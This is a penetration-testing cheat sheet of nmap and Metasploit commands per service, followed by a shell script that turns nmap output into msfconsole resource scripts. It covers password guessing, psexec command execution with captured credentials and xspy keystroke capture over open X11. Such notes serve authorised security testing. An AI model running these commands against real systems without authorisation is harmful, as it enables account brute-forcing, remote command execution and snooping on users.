Service scanning and attacks
1. Web service:
nmap -sS -PS80 -p 80 -oG web.txt IP
use auxiliary/scanner/http/webdav_scanner (finds WebDAV-enabled servers)
2. SSH service:
Nmap
use auxiliary/scanner/ssh/ssh_version
Password guessing: use auxiliary/scanner/ssh/ssh_login
3. Telnet service:
use auxiliary/scanner/telnet/telnet_version
4. FTP service:
use auxiliary/scanner/ftp/ftp_version
use auxiliary/scanner/ftp/anonymous // check whether anonymous login is allowed
5. SMB service:
Password guessing: use auxiliary/scanner/smb/smb_login (noisy: failed logons are recorded in the event log and can trigger account lockout)
use exploit/windows/smb/psexec # log in with captured credentials, e.g. against a domain controller
use auxiliary/admin/smb/psexec_command # run a single command
6. Oracle service:
nmap -sS -p 1521 IP
use auxiliary/scanner/oracle/tnslsnr_version
7. MSSQL service:
nmap -sS -sU -p T:1433,U:1434 IP (the U: ports are only scanned when -sU is given) or nmap -sU 192.168.33.130 -p 1434
use auxiliary/scanner/mssql/mssql_ping
8. MySQL service:
use auxiliary/scanner/mysql/mysql_version to find MySQL servers
use auxiliary/scanner/mysql/mysql
9. VNC service:
use auxiliary/scanner/vnc/vnc_none_auth // check for VNC with no authentication
10. SNMP service:
use auxiliary/scanner/snmp/snmp_enum
Community string guessing: use auxiliary/scanner/snmp/snmp_login
ADMsnmp IP -wordfile snmp.password [-outputfile <name>]
Use a known community string to pull system information: ./snmpenum.pl IP community_string cisco.txt (or linux.txt)
11. Open X11 (no authentication):
use auxiliary/scanner/x11/open_x11
Once a host is found with this weakness, the xspy tool can be used to watch the remote keyboard input: cd /pentest/sniffers/xspy/
xspy -display 192.168.1.100:0 -delay 100
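The notes above pair an nmap sweep with one Metasploit auxiliary module per service but leave the step between them to the operator. The script below is an added example (not part of the original notes) that closes that gap: it parses nmap's grepable (-oG) output for hosts with a given TCP port open and writes one msfconsole resource (.rc) script per service, using the module names listed above. The scan output it builds is constructed for the demo, the 192.168.1.x addresses are placeholders, and the port-to-module table is an assumption that you would extend for the other services in the list.

```shell
#!/bin/sh
# Added example: glue nmap -oG output to the Metasploit auxiliary scanners.
# Not from the original notes; the scan sample is constructed, not real.

# make_sample_gnmap FILE: write a constructed -oG sample (real -oG output is tab-separated).
make_sample_gnmap() {
    {
        printf '# Nmap 7.94 scan initiated as: nmap -sS -p 21,22,80 -oG sweep.txt 192.168.1.0/24\n'
        printf 'Host: 192.168.1.10 ()\tStatus: Up\n'
        printf 'Host: 192.168.1.10 ()\tPorts: 21/closed/tcp//ftp///, 22/open/tcp//ssh///, 80/open/tcp//http///\n'
        printf 'Host: 192.168.1.11 ()\tStatus: Up\n'
        printf 'Host: 192.168.1.11 ()\tPorts: 21/open/tcp//ftp///, 22/filtered/tcp//ssh///, 80/closed/tcp//http///\n'
        printf 'Host: 192.168.1.12 ()\tStatus: Up\n'
        printf 'Host: 192.168.1.12 ()\tPorts: 21/closed/tcp//ftp///, 22/closed/tcp//ssh///, 80/open/tcp//http///\n'
        printf '# Nmap done -- 256 IP addresses (3 hosts up) scanned\n'
    } > "$1"
}

# open_hosts FILE PORT: print the IPs in a -oG file whose TCP PORT is "open"
# (filtered/closed entries are skipped, so the scanners only get real targets).
open_hosts() {
    awk -F '\t' -v port="$2" '
        /^Host:/ {
            for (i = 2; i <= NF; i++) {
                if ($i !~ /^Ports: /) continue
                sub(/^Ports: /, "", $i)
                n = split($i, entries, /, /)
                for (j = 1; j <= n; j++) {
                    split(entries[j], f, "/")      # port/state/proto/owner/service/...
                    if (f[1] == port && f[2] == "open" && f[3] == "tcp") {
                        split($1, h, " "); print h[2]; break
                    }
                }
            }
        }' "$1"
}

# write_rc MODULE HOSTFILE OUT: resource script that runs MODULE against HOSTFILE
# (msfconsole accepts "set RHOSTS file:<path>" for a one-IP-per-line list).
write_rc() {
    printf 'use %s\nset RHOSTS file:%s\nset THREADS 10\nrun\n' "$1" "$2" > "$3"
}

# Port -> auxiliary module; assumed mapping built from the list in the notes.
SERVICE_MAP='21 auxiliary/scanner/ftp/anonymous
22 auxiliary/scanner/ssh/ssh_version
80 auxiliary/scanner/http/webdav_scanner'

# build_all GNMAP OUTDIR: one hosts file and one .rc per service that has live
# targets; prints the path of every .rc written.
build_all() {
    gnmap=$1; outdir=$2
    mkdir -p "$outdir"
    printf '%s\n' "$SERVICE_MAP" | while read -r port module; do
        name=${module##*/}
        open_hosts "$gnmap" "$port" > "$outdir/$name.hosts"
        if [ -s "$outdir/$name.hosts" ]; then
            write_rc "$module" "$outdir/$name.hosts" "$outdir/$name.rc"
            echo "$outdir/$name.rc"
        else
            rm -f "$outdir/$name.hosts"
        fi
    done
}

# Demo: sh thisfile.sh --demo, then: msfconsole -q -r out/webdav_scanner.rc
if [ "${1:-}" = "--demo" ]; then
    make_sample_gnmap sweep.gnmap
    build_all sweep.gnmap out
fi
```

Replace the constructed sample with a real `nmap -sS -p 21,22,80 -oG sweep.gnmap <range>` run and the same functions apply; each .rc is then fed to `msfconsole -q -r`. Keeping the hosts files per service also gives you a record of exactly which targets each module touched, which matters for the noisy modules (smb_login, ssh_login) flagged above.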